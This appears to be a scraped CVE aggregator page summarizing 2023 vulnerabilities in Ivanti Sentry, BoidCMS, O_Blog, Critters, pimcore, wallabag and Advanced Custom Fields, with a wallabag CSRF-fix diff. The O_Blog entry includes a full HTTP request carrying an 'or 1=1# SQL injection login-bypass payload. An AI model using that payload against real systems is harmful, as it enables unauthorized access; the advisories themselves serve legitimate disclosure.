A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration. 

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-38035: Ivanti Community

File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code via the GIF header component.

CVE-2023-38836

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BUTTERFLY BUTTON PROJECT - BUTTERFLY BUTTON (Architecture) allows loss of plausible deniability, confidentiality.This issue affects BUTTERFLY BUTTON: As of 2023-08-21.



This site uses cookies from Google to deliver its services and to analyze traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies.

Learn more

Got it

CVE-2023-40735: Advisories

SQL injection vulnerability in berkaygediz O_Blog v.1.0 allows a local attacker to escalate privileges via the secure_file_priv component.

SQL injection bypass login:  
POST /O\_Blog-main/ HTTP/1.1  
Host: 192.168.150.131  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: PHPSESSID=9697cab5c5ac6b604b268d245e9a9519  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 47

eposta=2384693535@qq.com'or 1=1#&sifre=31232132

CVE-2023-38899: sql sql injection · Issue #2 · berkaygediz/O_Blog

An issue was discovered in kdmserver service in LeEco LeTV X43 version V2401RCN02C080080B04121S, allows attackers to execute arbitrary code, escalate privileges, and cause a denial of service (DoS).

CVE-2020-28715

Critters versions 0.0.17-0.0.19 have an issue when parsing the HTML, which leads to a potential cross-site scripting (XSS) bug. We recommend upgrading to version 0.0.20 of the extension. 

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Package**

npm critters (npm)

**Affected versions**

0.0.17-0.0.19

**Description**

**Impact**

Critters version 0.0.17-0.0.19 have an issue when parsing the HTML which leads to a potential cross-site scripting (XSS) bug.

**Patches**

The bug has been fixed in v0.0.20.

**Workarounds**

Upgrading Critters version to >0.0.20 is the easiest fix. This is a non breaking version upgrade so we recommend all users to use v0.0.20.

CVE-2023-3481: Critical CSS inlining XSS Vulnerability Advisory

Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.6.8.

CVE-2023-4453

Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.6.3.

Expand Up @@ -69,12 +69,17 @@ public function createClientAction(Request $request, EntityManagerInterface $ent /\*\* \* Remove a client. \* \* @Route("/developer/client/delete/{id}", requirements={"id" = "\\d+"}, name="developer\_delete\_client") \* @Route("/developer/client/delete/{id}", requirements={"id" = "\\d+"}, name="developer\_delete\_client", methods={"POST"}) \* \* @return RedirectResponse \*/ public function deleteClientAction(Client $client, EntityManagerInterface $entityManager, TranslatorInterface $translator) public function deleteClientAction(Request $request, Client $client, EntityManagerInterface $entityManager, TranslatorInterface $translator) {  
if (!$this\->isCsrfTokenValid('delete-client', $request\->request\->get('token'))) { throw $this\->createAccessDeniedException('Bad CSRF token.'); }  
if (null === $this\->getUser() || $client\->getUser()->getId() !== $this\->getUser()->getId()) { throw $this\->createAccessDeniedException('You can not access this client.'); } Expand Down

CVE-2023-4455: Merge pull request from GHSA-gjvc-55fw-v6vq · wallabag/wallabag@ffcc5c9

CVE-2023-4454

Cross-site scripting vulnerability in Advanced Custom Fields versions 6.1.0 to 6.1.7 and Advanced Custom Fields Pro versions 6.1.0 to 6.1.7 allows a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product with the administrative privilege.

Source

CVE